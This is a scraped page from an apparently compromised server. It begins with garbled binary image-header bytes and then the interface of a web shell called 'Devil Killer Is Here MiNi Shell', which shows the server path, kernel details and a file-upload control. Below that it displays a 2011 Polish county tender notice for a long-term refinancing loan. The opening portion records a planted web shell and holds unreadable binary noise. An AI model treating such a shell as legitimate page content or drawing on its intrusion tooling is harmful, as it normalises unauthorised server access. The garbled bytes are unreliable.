JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111025/351512-N-2011.html

<p class="kh_header"><b>Strzelce Krajeńskie: Udzielenie kredytu długoterminowego w kwocie 2.836.830 zł z przeznaczeniem na spłatę wcześniej zaciągniętych zobowiązań</b><br>
<b>Numer ogłoszenia: 351512 - 2011; data zamieszczenia: 25.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Strzelecko-Drezdenecki , ul. Ks. St. Wyszyńskiego 7, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7632380, faks 095 7631126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fsd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego w kwocie 2.836.830 zł z przeznaczeniem na spłatę wcześniej zaciągniętych zobowiązań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa bankowa udzielenia kredytu długoterminowego w kwocie 2.836.830 zł (słownie: dwa miliony osiemset trzydzieści sześć tysięcy osiemset trzydzieści złotych) z przeznaczeniem na spłatę wcześniej zaciągniętych zobowiązań. 
1.	Kwota wykorzystanego kredytu będzie oprocentowana w stosunku rocznym, według zmiennej stopy procentowej. Stopa procentowa równa będzie wysokości stawki referencyjnej, powiększonej o marżę banku w wysokości określonej w ofercie. 
2.	Stawkę referencyjną stanowić będzie stawka WIBOR 3M, oznaczająca stopę procentową dla depozytów trzymiesięcznych, ustalana dla pierwszego okresu obrachunkowego według notowań na dziesięć dni kalendarzowych poprzedzających dzień całkowitej lub częściowej wypłaty kredytu, a dla kolejnych okresów obrachunkowych na dziesięć dni kalendarzowych poprzedzających rozpoczęcie danego okresu obrachunkowego. 
3.	W przypadku braku notowań stawki WIBOR dla danego dnia do wyliczenia stopy procentowej stosuje się odpowiednio notowania z dnia poprzedzającego, w którym było prowadzone notowanie danej stawki WIBOR. 
4.	W dniu zawarcia umowy kredytowej stosuje się stawkę WIBOR 3M obowiązującą na dzień zawarcia umowy. 
5.	Zamawiający nie wyraża zgody na zastosowanie stawki referencyjnej WIBOR 3M wg zasad stosowanych przez Wykonawcę, wybranego w wyniku procedury przetargowej. 
6.	Marża banku nie może ulec zwiększeniu w czasie trwania umowy o kredyt. 
7.	Zamawiający poza stałą marżą banku oraz prowizją za uruchomienie kredytu nie przewiduje żadnych innych kosztów związanych z uruchomieniem i obsługą kredytu. 
8.	Termin postawienia kredytu do dyspozycji - w ciągu 3 dni od podpisania umowy. 
9.	Sposób płatności kredytu - wymagane jest uruchomienie kredytu w jednej transzy w formie bezgotówkowej na rachunek bankowy powiatu nr 68 1020 1967 0000 8702 0006 0491. 
10.	Zamawiający będzie spłacał odsetki i raty od faktycznie wykorzystanych środków finansowych. 
11.	Kwota i waluta kredytu - 2.836.830 PLN.
12.	Oprocentowanie kredytu będzie oparte na stawce WIBOR 3M + marża banku w wysokości wynikającej ze złożonej oferty. Oprocentowanie będzie liczone od niespłaconej części kredytu.
13.	W celu uniknięcia różnic związanych z obliczaniem ceny kredytu, Wykonawcy do przekładanych ofert powinni zastosować stawkę WIBOR 3M obowiązującą na dzień ogłoszenia o zamówieniu, tj. 25 października 2011 roku - 4,89.
14.	W celu uniknięcia różnic związanych z obliczaniem ceny kredytu, Zamawiający wskazuje wysokość rat kapitałowych:  47.280,50 PLN, jaką należy wziąć pod uwagę przy obliczeniu ceny do oferty.
15.	Od Wykonawców wymagana jest akceptacja zabezpieczenia udzielonego kredytu wyłącznie w formie weksla in blanco. Zamawiający wyraża zgodę na zabezpieczenia w postaci weksla In blanco i deklaracji wekslowej wraz z kontrasygnatami Skarbnika Powiatu na obydwu dokumentach, pod warunkiem umieszczenia na wekslu podpisu Skarbnika z dopiskami wskazującymi na:
a)	funkcję podpisu - Kontrasygnatę,
b)	funkcję osoby kontrasygnującej weksel - Skarbnik Powiatu.
16.	Wprowadza się do umowy zapis art. 145 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych: 1. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 2. W przypadku, o którym mowa w ust. 1, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
17.	Do zawartej umowy stosowane będą przepisy Ustawy z dnia 23 kwietnia 1964 - Kodeks cywilny.   
18.	Zamawiający określa częstotliwość płatności rat kapitałowych i odsetkowych na dzień 28 każdego miesiąca, z tym, że pierwszy terminu płatności raty kapitałowej w dniu 28 stycznia 2012 roku, pierwszy termin płatności raty odsetkowej w dniu 28 listopada 2011 roku.
19.	Zamawiający będzie wnioskował o zawieszenie spłat rat za okres 3 miesięcy na żądanie, bez wskazywania bankowi konkretnych sytuacji.
20.	W przypadku zaistnienia sytuacji, w której Zamawiający zawiesi okres spłaty kredytu do 3 miesięcy, niespłacona w tym okresie kwota kredytu, zostanie rozłożona proporcjonalnie do pozostałych do spłaty rat. Zamawiający nie przewiduje wydłużenia okresu spłaty kredytu.
21.	Zamawiający przewiduje możliwość zmiany umowy kredytowej w części dotyczącej zmiany harmonogramu spłaty kredytu w przypadku niewykorzystania pełnej kwoty kredytu, częściowej spłaty kredytu w roku bieżącym, bądź zawieszenia okresu spłaty do 3 miesięcy. Określone wyżej zdarzenia stanowić będą warunki w rozumieniu art. 144 ustawy Pzp.
22.	Czas trwania zamówienia - 60 miesięcy, w tym:
- spłata rat kapitałowych - 60 miesięcy (28 styczeń 2012r. - 28 grudzień 2016r.), 
- spłata rat odsetkowych - 62 miesiące (28 listopad 2011r. - 28 grudzień 2016r.).        
23.	Zamawiający nie przewiduje prowizji od ewentualnych zmian umowy kredytowej.
24.	Zamawiający nie przewiduje innych opłat i prowizji związanych z udzieleniem kredytu oprócz wskazanej w formularzu cenowym stałej marży banku oraz prowizji za uruchomienie kredytu.
25.	Zamawiający określa kalendarz odsetkowy dla rzeczywistej liczby dni miesiąca, a roku 365/366 dni (uwzględnione lata przestępne).
26.	Termin płatności rat kapitałowych i odsetkowych w sytuacji, gdy termin płatności przypada na dzień wolny od pracy, przypadnie na pierwszy dzień roboczy następujący po dniu wolnym od pracy.
27.	Nieuruchomienie przez Wykonawcę środków finansowych w terminie wskazanym przez Zamawiającego skutkować będzie naliczeniem odsetek karnych w wysokości 0,5 % za każdy dzień zwłoki liczonych od nieuruchomionej kwoty kredytu. 
Celem wstępnego ustalenia zdolności kredytowej Zamawiający udostępnia na swojej stronie internetowej i w siedzibie Zamawiającego następujące dokumenty:
1.	Wniosek złożony do Regionalnej Izby Obrachunkowej w sprawie wydania decyzji o możliwości spłaty wnioskowanego kredytu.
- zestawienie przepływów pieniężnych.
- harmonogram spłaty kredytów oraz wykup papierów wartościowych.
2.	Uchwała Rady Powiatu Nr X/48/11 z dnia 28 czerwca 2011 roku w sprawie zaciągnięcia kredytu długoterminowego.
3.	Uchwała o wyborze starosty. 
4.	Uchwała o wyborze wicestarosty.
5.	Uchwała o wyborze członków Zarządu i uchwała zmieniająca.
6.	Uchwała o powołaniu skarbnika.
7.	Decyzja o nadaniu numeru NIP.
8.	Zaświadczenie o nadaniu numeru REGON.
9.	Opinie banków prowadzących rachunki.
10.	Zaświadczenie z ZUS o niezaleganiu ze składkami.
11.	Zaświadczenie z US o niezaleganiu z podatkami.
12.	Statut Powiatu Strzelecko-Drezdeneckiego.
13.	Sprawozdanie Rb-N za 2010 r.
14.	Sprawozdanie Rb-NDS za 2010 r. 
15.	Sprawozdanie Rb - Z za 2010 r.
16.	Sprawozdanie Rb - 27S za 2010 r.
17.	Sprawozdanie Rb - 28S za 2010 r.
18.	Sprawozdanie Rb - NDS za II kwartał 2011 r.
19.	Sprawozdanie Rb - N za II kwartał 2011 r.
20.	Sprawozdanie Rb - Z za II kwartał 2011 r.
21.	Sprawozdanie Rb - 27S za II kwartał 2011 r.
22.	Sprawozdanie Rb - 28S za II kwartał 2011 r.
23.	Sprawozdanie Rb - N za III kwartał 2011 r.
24.	Sprawozdanie RB - NDS za III kwartał 2011 r.
25.	Sprawozdanie Rb - Z za III kwartał 2011 r.
26.	Sprawozdanie Rb - 27S za III kwartał 2011 r.
27.	Sprawozdanie Rb - 28S za III kwartał 2011 r.
28.	Uchwała Nr 205/2011 Regionalnej Izby Obrachunkowej w sprawie wydania opinii o sprawozdaniu wykonania budżetu Powiatu za 2010 rok.
29.	Uchwała Nr 81/2011 Regionalnej Izby Obrachunkowej w sprawie wydania opinii o prawidłowości planowanej kwoty długu Powiatu Strzelecko-Drezdeneckiego na 2011 r.
30.	Uchwała Nr 539/2010 Regionalnej Izby Obrachunkowej w sprawie wydania opinii o przedłożonym projekcie uchwały budżetowej na 2011 rok.
31.	Uchwała Nr 492/2011 Regionalnej Izby Obrachunkowej w sprawie wydania opinii o przebiegu wykonania budżetu Powiatu Strzelecko-Drezdeneckiego za I półrocze 2011 roku.
32.	Uchwała Nr 555/2011 Regionalnej Izby Obrachunkowej w sprawie wydania opinii o możliwości spłaty kredytu zaciągniętego przez powiat strzelecko-drezdenecki.
33.	Sprawozdanie z wykonania budżetu powiatu za 2010 rok.
34.	Uchwała budżetowa na rok 2011 - Nr IV/23/11 z 27 stycznia 2011 r. 
35.	Uchwały w sprawie zmiany uchwały budżetowej na 2011 r.:
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr V/27/11 z dnia 24 luty 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 9/11 z dnia 24 luty 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 17/11 z dnia 29 marca 2011 r.,
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr VII/34/11 z dnia 30 czerwca 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 21/11 z dnia 12 kwietnia 2011 r.,
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr VIII/39/11 z dnia 28 kwietnia 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 23/11 z dnia 28 kwietnia 2011 r., 
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 24/11 z dnia 12 maja 2011 r., 
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 25/11 z dnia 19 maja 2011 r., 
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr IX/41/11 z dnia 26 maja 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 27/11 z dnia 7 czerwca 2011 r., 
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr X/46/11 z dnia 28 czerwca 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 32/11 z dnia 28 czerwca 2011 r., 
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 37/11 z dnia 22 lipca 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 48/11 z dnia 9 sierpnia 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 51/11 z dnia 18 sierpnia 2011 r., 
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 53/11 z dnia 30 sierpnia 2011 r.,
- Uchwała Rady Powiatu Strzelecko-Drezdeneckiego Nr XI/55/11 z dnia 22 września 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 59/11 z dnia22 września 2011 r.,
- Uchwała Zarządu Powiatu Strzelecko-Drezdeneckiego Nr 60/11 z dnia 6 października 2011 r.
36.	Wykaz majątku trwałego - stan mienia komunalnego na dzień 31.12.2010 r.
37.	Informacja o przebiegu wykonania budżetu powiatu za I półrocze 2011 r.
38.	Lista kredytów i pożyczek,
39.	Lista podmiotów powiązanych kapitałowo.
40.	Harmonogram spłaty kredytów oraz wykup papierów wartościowych.
Zamawiający nie posiada sprawozdań Rb - PDP, gdyż obowiązek sporządzania tego typu sprawozdań ciąży na gminach, a nie powiatach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości 14.000 zł.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
-	pieniądzu, 
-	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-?kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych, 
-	gwarancjach ubezpieczeniowych, 
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Bank PKO BP SA konto nr 82 1020 1967 0000 8502 0006 0822.
Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620), należy złożyć w formie oryginału. 
Dowód wniesienia wadium należy dołączyć do składanej oferty.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelnym podpisem (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 18 listopada 2011r., do godz. 13.00 .
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. 
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie Wykonawcy, który w określonym terminie nie złożył wymaganych oświadczeń lub dokumentów lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, (gdy zamawiający wezwał wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów niezbędnych do przeprowadzenia postępowania, w tym potwierdzających spełnianie warunków udziału w postępowaniu, albo spełniania przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, które zamawiający wskazał w ogłoszeniu o zamówieniu lub Specyfikacji Istotnych Warunków Zamówienia, lub którzy nie złożyli pełnomocnictw, albo, którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa) nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Dowód wniesienia wadium należy dołączyć do składanej oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawcy przedłożą zezwolenie Prezesa NBP na wykonywanie czynności bankowych lub inny stosowny dokument uprawniający do wykonywania tych czynności, dokumenty potwierdzające posiadanie uprawnień /pełnomocnictw osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawcy udzielili w ostatnich pięciu latach 3 kredyty, każdy z nich o wartości minimum 1.000.000 zł odpowiadające swoim rodzajem i zakresem usług przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawcy złożą stosowne oświadczenie na załączonym druku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- minimum 3 letni staż pracy przy realizacji zamówień odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawcy złożą stosowne oświadczenie na załączonym druku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
